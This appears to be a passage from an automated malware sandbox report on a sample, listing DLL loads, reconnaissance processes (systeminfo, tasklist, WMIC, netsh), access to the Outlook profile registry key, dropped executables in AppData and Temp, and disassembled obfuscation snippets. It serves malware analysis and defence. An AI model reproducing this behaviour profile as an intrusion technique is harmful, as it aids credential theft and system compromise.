                  Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: aepic.dll
                  Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
                  Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                  Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\explorer.exeSection loaded: propsys.dll
                  Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
                  Source: C:\Windows\explorer.exeSection loaded: wininet.dll
                  Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\explorer.exeSection loaded: wldp.dll
                  Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
                  Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
                  Source: C:\Windows\explorer.exeSection loaded: netutils.dll
                  Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                  Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\ROUTE.EXESection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\ROUTE.EXESection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\ROUTE.EXESection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\ROUTE.EXESection loaded: dnsapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                  Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
                  Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                  Data Obfuscation

                  barindex
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeUnpacked PE file: 0.2.OCYe9qcxiM.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;
                  Source: C:\Users\user\AppData\Roaming\hehcrfbUnpacked PE file: 4.2.hehcrfb.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeUnpacked PE file: 7.2.4470.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;
                  Source: C:\Users\user\AppData\Roaming\fihcrfbUnpacked PE file: 8.2.fihcrfb.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeCode function: 9_2_00007FF780B678EC LoadLibraryA,GetProcAddress,GetCurrentProcess,IsWow64Process,9_2_00007FF780B678EC
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeCode function: 0_2_004014D9 pushad ; ret 0_2_004014E9
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeCode function: 0_2_004031DB push eax; ret 0_2_004032AB
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeCode function: 0_2_00795033 pushfd ; iretd 0_2_00795034
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeCode function: 0_2_00794536 push B63524ADh; retn 001Fh0_2_0079456D
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeCode function: 0_2_00796193 push esp; ret 0_2_00796195
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeCode function: 0_2_02161540 pushad ; ret 0_2_02161550
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 4_2_004014D9 pushad ; ret 4_2_004014E9
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 4_2_004031DB push eax; ret 4_2_004032AB
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 4_2_005F1540 pushad ; ret 4_2_005F1550
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 4_2_0063E558 pushad ; retf 4_2_0063E5CD
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 4_2_0064522B push esp; ret 4_2_0064522D
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 4_2_006435CE push B63524ADh; retn 001Fh4_2_00643605
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 4_2_006440CB pushfd ; iretd 4_2_006440CC
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeCode function: 7_2_0040100B push esi; ret 7_2_0040100C
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeCode function: 7_2_0040280E push esp; ret 7_2_004029C6
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeCode function: 7_2_0040281F push esp; ret 7_2_004029C6
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeCode function: 7_2_00402822 push esp; ret 7_2_004029C6
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeCode function: 7_2_00401328 push edi; retf 7_2_0040132A
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeCode function: 7_2_004027ED push esp; ret 7_2_004029C6
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeCode function: 7_2_004027FB push esp; ret 7_2_004029C6
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeCode function: 7_2_006D1313 push edi; retf 7_2_006D1314
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeCode function: 7_2_006D0FFC push esi; ret 7_2_006D0FFD
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeCode function: 7_2_006D2A81 push 9A832F1Fh; iretd 7_2_006D2A87
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeCode function: 7_2_02161909 push esp; iretd 7_2_021619BF
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeCode function: 7_2_02162854 push esp; ret 7_2_02162A2D
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeCode function: 7_2_02162875 push esp; ret 7_2_02162A2D
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeCode function: 7_2_02161072 push esi; ret 7_2_02161073
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeCode function: 7_2_02162862 push esp; ret 7_2_02162A2D
